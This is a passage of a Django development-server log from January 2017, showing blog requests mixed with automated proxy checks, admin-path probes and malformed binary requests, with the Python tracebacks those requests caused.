[12/Jan/2017 09:01:14] "GET /blog HTTP/1.1" 301 0
/usr/local/lib/python2.7/dist-packages/markdown/__init__.py:143: DeprecationWarning: "safe_mode" is deprecated in Python-Markdown. Use an HTML sanitizer (like Bleach https://bleach.readthedocs.io/) if you are parsing untrusted markdown text. See the 2.6 release notes for more info
  DeprecationWarning)

[12/Jan/2017 09:01:14] "GET /blog/ HTTP/1.1" 200 5202
[12/Jan/2017 10:33:46] "GET http://www.baidu.com/?rands=_11850122660037672443795224 HTTP/1.0" 404 1686
[12/Jan/2017 10:33:47] "GET http://23.251.55.38/index.html?rands=_11305104904034180924727260 HTTP/1.0" 404 1712
[12/Jan/2017 11:34:52] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[12/Jan/2017 12:10:25] "CONNECT search.yahoo.com:443 HTTP/1.1" 404 1656
[12/Jan/2017 14:15:39] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00)$\xe0\x00\x00\x00\x00\x00Cookie:')
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 117, in handle
    if not self.parse_request(): # An error code has been sent, just exit
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 281, in parse_request
    "Bad HTTP/0.9 request type (%r)" % command)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 368, in send_error
    self.send_response(code, message)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 385, in send_response
    self.log_request(code)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 422, in log_request
    self.requestline, str(code), str(size))
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 138, in log_message
    msg = "[%s] %s\n" % (self.log_date_time_string(), format % args)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe0 in position 6: ordinal not in range(128)
[12/Jan/2017 14:15:43] "CONNECT search.yahoo.com:443 HTTP/1.1" 404 1656
[12/Jan/2017 14:15:53] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00)$\xe0\x00\x00\x00\x00\x00Cookie:')
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 117, in handle
    if not self.parse_request(): # An error code has been sent, just exit
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 281, in parse_request
    "Bad HTTP/0.9 request type (%r)" % command)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 368, in send_error
    self.send_response(code, message)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 385, in send_response
    self.log_request(code)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 422, in log_request
    self.requestline, str(code), str(size))
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 138, in log_message
    msg = "[%s] %s\n" % (self.log_date_time_string(), format % args)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe0 in position 6: ordinal not in range(128)
[12/Jan/2017 14:16:34] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00)$\xe0\x00\x00\x00\x00\x00Cookie:')
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 117, in handle
    if not self.parse_request(): # An error code has been sent, just exit
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 281, in parse_request
    "Bad HTTP/0.9 request type (%r)" % command)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 368, in send_error
    self.send_response(code, message)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 385, in send_response
    self.log_request(code)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 422, in log_request
    self.requestline, str(code), str(size))
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 138, in log_message
    msg = "[%s] %s\n" % (self.log_date_time_string(), format % args)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe0 in position 6: ordinal not in range(128)
[12/Jan/2017 14:16:34] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00)$\xe0\x00\x00\x00\x00\x00Cookie:')
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 117, in handle
    if not self.parse_request(): # An error code has been sent, just exit
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 281, in parse_request
    "Bad HTTP/0.9 request type (%r)" % command)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 368, in send_error
    self.send_response(code, message)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 385, in send_response
    self.log_request(code)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 422, in log_request
    self.requestline, str(code), str(size))
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 138, in log_message
    msg = "[%s] %s\n" % (self.log_date_time_string(), format % args)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe0 in position 6: ordinal not in range(128)
[12/Jan/2017 14:16:41] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00)$\xe0\x00\x00\x00\x00\x00Cookie:')
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 117, in handle
    if not self.parse_request(): # An error code has been sent, just exit
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 281, in parse_request
    "Bad HTTP/0.9 request type (%r)" % command)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 368, in send_error
    self.send_response(code, message)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 385, in send_response
    self.log_request(code)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 422, in log_request
    self.requestline, str(code), str(size))
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 138, in log_message
    msg = "[%s] %s\n" % (self.log_date_time_string(), format % args)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe0 in position 6: ordinal not in range(128)
[12/Jan/2017 14:17:13] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00)$\xe0\x00\x00\x00\x00\x00Cookie:')
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 117, in handle
    if not self.parse_request(): # An error code has been sent, just exit
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 281, in parse_request
    "Bad HTTP/0.9 request type (%r)" % command)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 368, in send_error
    self.send_response(code, message)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 385, in send_response
    self.log_request(code)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 422, in log_request
    self.requestline, str(code), str(size))
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 138, in log_message
    msg = "[%s] %s\n" % (self.log_date_time_string(), format % args)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe0 in position 6: ordinal not in range(128)
[12/Jan/2017 14:18:46] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00)$\xe0\x00\x00\x00\x00\x00Cookie:')
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 117, in handle
    if not self.parse_request(): # An error code has been sent, just exit
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 281, in parse_request
    "Bad HTTP/0.9 request type (%r)" % command)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 368, in send_error
    self.send_response(code, message)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 385, in send_response
    self.log_request(code)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 422, in log_request
    self.requestline, str(code), str(size))
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 138, in log_message
    msg = "[%s] %s\n" % (self.log_date_time_string(), format % args)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe0 in position 6: ordinal not in range(128)
[12/Jan/2017 14:18:49] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00)$\xe0\x00\x00\x00\x00\x00Cookie:')
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 117, in handle
    if not self.parse_request(): # An error code has been sent, just exit
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 281, in parse_request
    "Bad HTTP/0.9 request type (%r)" % command)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 368, in send_error
    self.send_response(code, message)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 385, in send_response
    self.log_request(code)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 422, in log_request
    self.requestline, str(code), str(size))
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 138, in log_message
    msg = "[%s] %s\n" % (self.log_date_time_string(), format % args)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe0 in position 6: ordinal not in range(128)
[12/Jan/2017 14:18:59] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00)$\xe0\x00\x00\x00\x00\x00Cookie:')
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 117, in handle
    if not self.parse_request(): # An error code has been sent, just exit
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 281, in parse_request
    "Bad HTTP/0.9 request type (%r)" % command)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 368, in send_error
    self.send_response(code, message)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 385, in send_response
    self.log_request(code)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 422, in log_request
    self.requestline, str(code), str(size))
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 138, in log_message
    msg = "[%s] %s\n" % (self.log_date_time_string(), format % args)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe0 in position 6: ordinal not in range(128)
[12/Jan/2017 14:19:08] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00)$\xe0\x00\x00\x00\x00\x00Cookie:')
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 117, in handle
    if not self.parse_request(): # An error code has been sent, just exit
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 281, in parse_request
    "Bad HTTP/0.9 request type (%r)" % command)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 368, in send_error
    self.send_response(code, message)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 385, in send_response
    self.log_request(code)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 422, in log_request
    self.requestline, str(code), str(size))
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 138, in log_message
    msg = "[%s] %s\n" % (self.log_date_time_string(), format % args)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe0 in position 6: ordinal not in range(128)
[12/Jan/2017 14:19:22] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00)$\xe0\x00\x00\x00\x00\x00Cookie:')
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 117, in handle
    if not self.parse_request(): # An error code has been sent, just exit
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 281, in parse_request
    "Bad HTTP/0.9 request type (%r)" % command)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 368, in send_error
    self.send_response(code, message)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 385, in send_response
    self.log_request(code)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 422, in log_request
    self.requestline, str(code), str(size))
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 138, in log_message
    msg = "[%s] %s\n" % (self.log_date_time_string(), format % args)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe0 in position 6: ordinal not in range(128)
[12/Jan/2017 14:19:23] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00)$\xe0\x00\x00\x00\x00\x00Cookie:')
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 117, in handle
    if not self.parse_request(): # An error code has been sent, just exit
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 281, in parse_request
    "Bad HTTP/0.9 request type (%r)" % command)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 368, in send_error
    self.send_response(code, message)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 385, in send_response
    self.log_request(code)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 422, in log_request
    self.requestline, str(code), str(size))
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 138, in log_message
    msg = "[%s] %s\n" % (self.log_date_time_string(), format % args)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe0 in position 6: ordinal not in range(128)
[12/Jan/2017 14:21:20] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[12/Jan/2017 14:21:34] "GET http://www.ip.cn/?rands=_2799914712502251095558936 HTTP/1.0" 404 1669
[12/Jan/2017 14:21:34] "GET http://m.sogou.com/?rands=_1025107440011105252208000 HTTP/1.0" 404 1677
[12/Jan/2017 14:21:34] "GET http://www.baidu.com/?rands=_392794112023238092544696 HTTP/1.0" 404 1684
[12/Jan/2017 18:11:46] "GET /index.php HTTP/1.1" 404 2032
[12/Jan/2017 18:51:57] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[12/Jan/2017 18:57:37] "GET http://clientapi.ipip.net/echo.php?info=1234567890 HTTP/1.1" 404 1712
[12/Jan/2017 19:08:00] "GET http://www.server110.com/ HTTP/1.1" 404 1668
[12/Jan/2017 19:08:00] "CONNECT www.linode.com:443 HTTP/1.1" 404 1652
[12/Jan/2017 19:08:00] "CONNECT www.linode.com:443 HTTP/1.1" 404 1652
[12/Jan/2017 19:08:00] "CONNECT www.linode.com:443 HTTP/1.1" 404 1652
[12/Jan/2017 19:28:14] "GET http://www.baidu.com/?rands=_7582420647482942445232128 HTTP/1.0" 404 1685
[12/Jan/2017 19:28:15] "GET http://23.251.55.38/index.html?rands=_956567003201274940018828568 HTTP/1.0" 404 1713
[12/Jan/2017 20:25:40] "GET http://www.google.com/ HTTP/1.1" 404 1656
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[12/Jan/2017 20:25:40] "GET http://www.google.com/ HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[12/Jan/2017 20:25:40] "CONNECT www.baidu.com HTTP/1.1" 404 1632
[12/Jan/2017 21:39:52] "CONNECT search.yahoo.com:443 HTTP/1.1" 404 1656
[13/Jan/2017 00:25:37] "GET /index.php HTTP/1.1" 404 2032
[13/Jan/2017 00:37:31] "GET / HTTP/1.1" 404 2005
[13/Jan/2017 03:14:22] "GET http://testp3.pospr.waw.pl/testproxy.php HTTP/1.1" 404 1715
[13/Jan/2017 03:14:22] "CONNECT www.baidu.com HTTP/1.1" 404 1632
[13/Jan/2017 03:42:15] "HEAD / HTTP/1.0" 404 0
[13/Jan/2017 04:22:09] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[13/Jan/2017 04:23:31] "GET http://www.baidu.com/?rands=_1100062540021143071391992 HTTP/1.0" 404 1685
[13/Jan/2017 04:23:31] "GET http://23.251.55.38/index.html?rands=_5344110217441723016539264 HTTP/1.0" 404 1711
[13/Jan/2017 04:33:35] "GET /axis2/ HTTP/1.1" 404 2023
[13/Jan/2017 04:44:22] "GET / HTTP/1.1" 404 2005
[13/Jan/2017 05:45:50] "GET /manager/html HTTP/1.1" 404 2041
[13/Jan/2017 07:12:34] "GET /index.php HTTP/1.1" 404 2032
[13/Jan/2017 08:27:25] "GET /manager/html HTTP/1.1" 404 2041
[13/Jan/2017 08:39:05] "GET /manager/html HTTP/1.1" 404 2041
[13/Jan/2017 08:58:27] "GET /script HTTP/1.1" 404 2023
[13/Jan/2017 10:41:10] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[13/Jan/2017 13:20:46] "GET http://www.baidu.com/?rands=_1647114651287892225655976 HTTP/1.0" 404 1685
[13/Jan/2017 13:20:50] "GET http://23.251.55.38/index.html?rands=_4516114290023854051873372 HTTP/1.0" 404 1711
[13/Jan/2017 14:30:39] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[13/Jan/2017 15:21:54] "HEAD /index.php HTTP/1.1" 404 0
[13/Jan/2017 15:21:54] "HEAD /admin/images/tango.png HTTP/1.1" 404 0
[13/Jan/2017 19:56:52] "GET http://clientapi.ipip.net/echo.php?info=1234567890 HTTP/1.1" 404 1712
[13/Jan/2017 21:31:07] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[13/Jan/2017 21:39:49] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[13/Jan/2017 22:12:58] "GET http://www.baidu.com/?rands=_19848135569023585103502944 HTTP/1.0" 404 1686
[13/Jan/2017 22:12:58] "GET http://23.251.55.38/index.html?rands=_5382759092913771153152 HTTP/1.0" 404 1708
[13/Jan/2017 23:25:57] "GET /manager/html HTTP/1.1" 404 2041
[14/Jan/2017 00:31:01] "GET http://www.baidu.com/ HTTP/1.1" 404 1652
[14/Jan/2017 01:53:12] "GET / HTTP/1.1" 404 2002
[14/Jan/2017 03:30:30] "CONNECT search.yahoo.com:443 HTTP/1.1" 404 1656
[14/Jan/2017 04:14:15] "GET /axis2/ HTTP/1.1" 404 2023
[14/Jan/2017 05:03:47] "GET http://testp1.piwo.pila.pl/testproxy.php HTTP/1.1" 404 1715
[14/Jan/2017 05:54:20] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[14/Jan/2017 07:08:52] "GET http://www.baidu.com/?rands=_7832143021632960794767488 HTTP/1.0" 404 1685
[14/Jan/2017 07:08:52] "GET http://23.251.55.38/index.html?rands=_1935524394836611491840320 HTTP/1.0" 404 1711
[14/Jan/2017 08:39:49] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[14/Jan/2017 10:02:35] "GET /index.php HTTP/1.1" 404 2032
[14/Jan/2017 11:20:57] "GET / HTTP/1.1" 404 2004
[14/Jan/2017 12:53:19] "GET / HTTP/1.1" 404 2005
[14/Jan/2017 13:17:19] "GET /blog/ HTTP/1.1" 200 5202
[14/Jan/2017 14:17:31] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[14/Jan/2017 14:36:02] "GET /manager/html HTTP/1.1" 404 2041
[14/Jan/2017 14:55:44] "GET /blog/ HTTP/1.1" 200 5202
[14/Jan/2017 15:55:37] "GET http://www.izhongsai.com/show.html?t=1484409337369 HTTP/1.1" 404 1711
[14/Jan/2017 16:09:30] "GET http://www.baidu.com/?rands=_2304986018441846962784 HTTP/1.0" 404 1682
[14/Jan/2017 16:09:31] "GET http://23.251.55.38/index.html?rands=_591548528612910323254472 HTTP/1.0" 404 1710
[14/Jan/2017 16:10:12] "GET /manager/html HTTP/1.1" 404 2041
[14/Jan/2017 17:26:41] "CONNECT search.yahoo.com:443 HTTP/1.1" 404 1656
[14/Jan/2017 19:14:59] "GET /robots.txt HTTP/1.1" 404 2040
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[14/Jan/2017 19:14:59] "GET /robots.txt HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[14/Jan/2017 19:15:03] "GET / HTTP/1.1" 404 2010
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[14/Jan/2017 19:15:03] "GET / HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[14/Jan/2017 19:16:18] "GET / HTTP/1.1" 404 2010
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[14/Jan/2017 19:16:18] "GET / HTTP/1.1" 500 59
Traceback (most recent call last):
